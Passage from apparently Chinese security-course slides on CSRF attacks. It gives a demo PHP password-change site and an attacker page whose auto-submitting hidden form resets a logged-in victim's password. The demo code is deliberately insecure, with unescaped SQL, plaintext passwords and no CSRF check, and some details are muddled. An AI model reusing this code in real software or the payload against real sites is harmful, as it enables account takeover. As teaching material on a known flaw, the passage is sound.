《计算机网络安全防护技术（第二版）》 课件 第7章 任务7.3 CSRF漏洞攻击与防御

第7章Web安全技术编著：

秦燊劳翠金

任务7.3

CSRF漏洞攻击与防御任务7.3CSRF漏洞攻击与防御

诸如修改用户密码、银行帐号转账等关键处理中，会涉及到跨站请求伪造漏洞（Cross-SiteRequestForgeries漏洞），简称CSRF漏洞。针对CSRF漏洞的攻击就是CSRF攻击。

CSRF漏洞会导致遭受的攻击主要有：更改用户密码或邮箱地址、删除用户帐号、使用用户账号购物、使用用户帐号发帖等。预防CSRF漏洞的方法，是在执行关键处理之间，先确认是否用户自愿发起的请求。

一、网页的内容及功能。

首先用户通过的25.htm输入用户名及密码登录，登录成功后进入26.php欢迎页面，在26.php页面中，点击“下一页”，进入27.php密码修改链接页面。1.网站的密码修改链接页面27.php内容如下：<head><metahttp-equiv="Content_Type"content="text/html";charset="utf-8"/></head><body><?phpsession_start();$id=$_SESSION['aa'];if($id==''){ die('请登录');}?>已登录（username:<?phpechohtmlspecialchars($id,ENT_NOQUOTES,'UTF-8');?>)<br><ahref="28.php">修改密码</a></body>网页27.php的显示效果如图7-3-1所示。点击“修改密码”链接后，进入28.php密码修改页面。图7-3-1网站www.上的网页27.php2.网站的密码修改链接页面28.php内容如下：<?phpsession_start();$id=$_SESSION['aa'];if($id==''){ die('请登录');}?>username:<?phpechohtmlspecialchars($id,ENT_NOQUOTES,'UTF-8');?><br>请输入新密码：<br><formaction="29.php"method="POST"> <inputtype="password"name="password"> <inputtype="submit"value="提交修改"></form>网页28.php的显示效果如图7-3-2所示。

用户输入新密码，如“123”，点击“提交修改”按钮后，页面转到进行密码写入数据库的页面29.php。图7-3-2网站www.上的网页28.php3.网站的网页29.php内容如下：<?phpsession_start();$password=$_POST['password'];$username=$_SESSION['aa'];require'conn.php';mysql_query("updateusersetpassword='$password'whereusername='$username'");if(mysql_affected_rows()) echo"密码更改成功！";else echo"密码更新失败！";?>网页28.php的显示效果如图7-3-3所示。图7-3-3网站www.上的网页29.php二、攻击者利用被攻击网页的漏洞，篡改用户密码若用户已经通过的登录页面25.htm成功登录site1，后被诱导访问攻击者网站的页面27.htm，则site1当前用户的密码将会被篡改。1.攻击者网站上，网页27.htm的内容：<iframeheight="160"src="28.php"></iframe>2.攻击者网站上，网页28.php的内容：<bodyonload="document.forms[0].submit()"> <formaction="/29.php"method="POST"> <inputtype="hidden"name="password"value="heike"> </form></body>